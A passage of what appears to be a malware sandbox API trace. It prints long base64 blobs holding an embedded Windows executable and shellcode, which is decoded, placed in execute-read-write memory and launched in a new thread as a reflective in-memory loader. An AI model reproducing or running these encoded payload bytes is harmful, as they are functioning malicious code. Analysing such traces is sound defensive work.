gNi038weETCciJRfyLRfgDRfyJRfzry4tF/IPEDF3CBABmLg8fhAAAAAAADx9AAE1akAADAAAABAAAAP//AAC4AAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOAAAAAOH7oOALQJzSG4AUzNIVRoaXMgcHJvZ3JhbSBjYW5ub3QgYmUgcnVuIGluIERPUyBtb2RlLg0NCiQAAAAAAAAAnuU299qEWKTahFik2oRYpAd7iKTYhFiknNW5pNiEWKSc1Yek3YRYpJzVuKTYhFikB3uTpMeEWKTahFmkfIRYpNqEWKTphFik19aGpNuEWKRSaWNo2oRYpAAAAAAAAAAAUEUAAEwBBABI4KRdAAAAAAAAAADgAAIhCwEMAABqAwAAJgIAAAAAAEAaAgAAEAAAAIADAAAAABAAEAAAAAIAAAYAAAAAAAAABgAAAAAAAAAAwAUAAAQAAAAAAAACAEAFAAAQAAAQAAAAABAAABAAAAAAAAAQAAAAAAAAAAAAAAC0bQQALAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACQBQBcIwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIADANACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAudGV4dAAAACRpAwAAEAAAAGoDAAAEAAAAAAAAAAAAAAAAAAAgAABgLnJkYXRhAAD8/AAAAIADAAD+AAAAbgMAAAAAAAAAAAAAAAAAQAAAQC5kYXRhAAAA4AMBAACABAAABAEAAGwEAAAAAAAAAAAAAAAAAEAAAMAucmVsb2MAAFwjAAAAkAUAACQAAABwBQAAAAAAAAAAAAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACjdQMQAAAAAAAAAAAAAAAAVYnlXcNmLg8fhAAAAAAAkFWJ5VCLRQgxyYlF/InIg8QEXcNmLg8fhAAAAAAADx8AVYnlUItFCDHJiUX8iciDxARdw2YuDx+EAAAAAAAPHwBVieVQi0UIMcmJRfyJyIPEBF3DZi4PH4QAAAAAAA8fAFWJ5VCLRQgxyYlF/InIg8QEXcNmLg8fhAAAAAAADx8AVY2sJNj+//+B7CgBAABq/v81FIMFEP81EBAAEGShAAAAAFCD7CihEIMFEDFF+DHoiYUkAQAAU1ZXUI1F8GShAAAAAIu1MAEAAIl11DHbiV3YiV3kiV3ciV38x0XjAQAAAMcFHIMFEJQAAAD/FayBAxCFwHQMgz0sgwUQAXQDiF3jOF3jdQ9qBFNW/xWogQMQ6aQCAADGhQgBAABgxoUJAQAAS8aFCgEAAFXGhQsBAABSxoUMAQAAVcaFDQEAAFLGhQ4BAABVxoUPAQAASMaFEAEAABLGhREBAABVxoUSAQAAUsaFEwEAAFWInRQBAADGhRgBAABnxoUZAQAATsaFGgEAAFnGhRsBAABSxoUcAQAAXcaFHQEAAFHGhR4BAABZxoUfAQAAYYidIAEAAI2FCAEAAFDoR/7//42FGAEAAFDoO/7//2gFAQAAU41FAOjNVwMAg8QUvgQBAABWjUUAUP8VpIEDEInHjY0IAQAAjUEBihFBONp1+SnBjUQ5ATnwD4e+AQAAjY0IAQAAjXEBigFBONh1+SnxQVGNhQgBAABQjUQ9AFDoBVgDAIPEDFO/gAAAAFdqA1NqAWgAAACAjUUAUIs1CIEDEP/WiUXkg/j/dCyNRQBQ/3XUjYUYAQAAUItN5OjX/f//AyUMAAAAhcAPhE0BAACJfdjpRQEAAIldyI1NyFFQ/xXcgAMQiUXMOV3ID4UrAQAAQFBqQP8VgIADEIlF3DnYD4QWAQAAU41F0FD/dcz/ddz/deT/FYSAAxCFwA+E+gAAAP915P8ViIADEIld5FNXagNTagJoAAAAQI1FAFD/1olF5IP4/w+E0AAAAI2F6P7//1CLddxW6HxdAwBZWYnHU41F0FA533Uz/3XQVv915P8VjIADEIXAD4SeAAAAjUUAUP911I2F6P7//1CLTeToBP3//wMlDAAAAOt1ifgp8FBW/3XkizWMgAMQ/9aFwHRrjUUAUP911I2F6P7//1CLTeTo0fz//wMlDAAAAIXAdEuNhej+//+NUAGKCEA42XX5KdCJRdSNhej+//+NSAGKEEA42nX5KchTjU3QUYtN3CtN1Cn5A03MUQH4UP915P/WhcB0B8dF2AEAAADHRfz+////6FD8//+LRdiLTfBkiQ0AAAAAWV9eW4uNJAEAADHp6HL8//+BxSgBAADJw8NmDx+EAAAAAACNBaAQABCjGIMFEMPMzMzMg+wIiw2wgwUQg8j/hcnHRCQEAAAAAHQ+jUQkBGoAUI1UJAhqBFJqAGoAaAAkiYVRx0QkIAAAAAD/FZCAAxCFwHQPgTwkABAAAHUGMcCDxAjDuPn///+DxAjDZg8fRAAAjQUwFAAQo7iDBRCNBbAUABCjvIMFEMNmDx+EAAAAAABVieWD7CBWvnSBBBBWagBoAQASAP8VlIADEIXAo7SDBRB1M2oBjUXsUP8VEIADEIXAdCODZfwAjUXsVolF+GoAjUX0UMdF9AwAAAD/FZiAAxCjtIMFEDHAOQW0gwUQXg+VwMPMzMzMzMzMzMzMzMzMVVNXVoHsQAQAAIu8JFwEAACLtCRYBAAAi6wkVAQAAFVobRUAEA+EV1IDAA+FUVIDAKYBAABUBwAA2iEAANIDAAA6GAAAuhwAAEQIAABAieNQVVNojhUAEA+E0lQDAA+FzFQDAP8VoIADECsNAACDxAxTaK0VABAPhBFSAwAPhQtSAwD/FaiAAxDwFQAAhcB1OlNo2xUAEA+E/VEDAA+F91EDAJcjAAB1EQAAlR8AAOcjAABSCQAA9BAAAIXAdDt1Cv8VDIADEFQdAABXVlBoCRYAEA+E5wAAAA+F4QAAAP8VCIADELEZAACJwYnIgcRABAAAXl9bXcIMALgA/P//kMaEBEAEAAAAQHX1U2hZFgAQD4RrUQMAD4VlUQMAbCEAABMIAAApEwAAfCAAAH0OAAAoBAAAYQsAAIoUJID6LnRFdQRAAQAA99i7APz//2aQjSwYMcmB/QD8//90jnUE0gMAAIXbD4SA////dQTHGAAAiJQcQAQAAA+2lBwBBAAAQ4D6LnXKjUQkQFdWUGjSFgAQD4Ro/v//D4Vi/v//GRIAAN0AAAAAEwAAaSMAABMYAADpMv///2YPH4QAAAAAAFVTV1aB7BwIAACLrCQwCAAAhe0PhDsFAAB1BP0VAACLTTyJyIlMJBCLTCl4McCLdCkYhfYPhBwFAAB1BEYMAACLlCQ0CAAAi0QpHIt8KSSLXCkgM5QkOAgAAAHoAe8B64lEJAiNBCmJRCQMiVQkFJCLAwHoUI1EJCBQaIcXABAPhFtQAwAPhVVQAwBYAQAABwIAACkdAACUCgAAoRYAAP0TAADeFwAAikQkHITAdCh1BOcdAACNTCQdDx+AAAAAAInCgMKfgPoZdwUE4IhB/w+2AUGEwHXpjUQkHIk8JFBo2hcAEA+E2E8DAA+F0k8DAP8VBIADEK0gAACD+AGJXCQYdR0PtkwkHIHBmgIAAInL6eYCAABmLg8fhAAAAAAAkInHg/gQc1mF/w+EfgIAAHUK/xVIggMQFBkAALiaAgA", cchString=0x787d9, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x1ef904, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x1ef904, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0157.427] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x5a5e0) returned 0x469448 [0157.428] CryptStringToBinaryA (in: pszString="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", cchString=0x787d9, dwFlags=0x6, pbBinary=0x469448, pcbBinary=0x1ef904, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x469448, pcbBinary=0x1ef904, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0157.434] VirtualAlloc (lpAddress=0x0, dwSize=0x5a5e0, flAllocationType=0x3000, flProtect=0x40) returned 0x260000 [0157.539] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x260000, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x34 [0157.540] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x469448 | out: hHeap=0x450000) returned 1 [0157.540] RtlExitUserThread (Status=0x0) [0157.540] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x45ede0 | out: hHeap=0x450000) returned 1 Thread: id = 248 os_tid = 0x688 [0157.550] GetProcAddress (hModule=0x77110000, lpProcName="IsBadReadPtr") returned 0x7714d075 [0157.551] GetProcAddress (hModule=0x77110000, lpProcName="VirtualAlloc") returned 0x77121856 [0157.551] GetProcAddress (hModule=0x77110000, lpProcName="VirtualFree") returned 0x7712186e [0157.551] GetProcAddress (hModule=0x77110000, lpProcName="VirtualProtect") returned 0x7712435f [0157.551] GetProcAddress (hModule=0x77110000, lpProcName="VirtualQuery") returned 0x7712445a [0157.551] GetProcAddress (hModule=0x77110000, lpProcName="ExitThread") returned 0x7767d598 [0157.551] VirtualAlloc (lpAddress=0x10000000, dwSize=0x5c000, flAllocationType=0x1000, flProtect=0x4) returned 0x0 [0157.551] VirtualAlloc (lpAddress=0x0, dwSize=0x5c000, flAllocationType=0x1000, flProtect=0x4) returned 0xb0000 [0157.551] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x20000 [0157.592] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x752e0000 [0157.713] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x70000 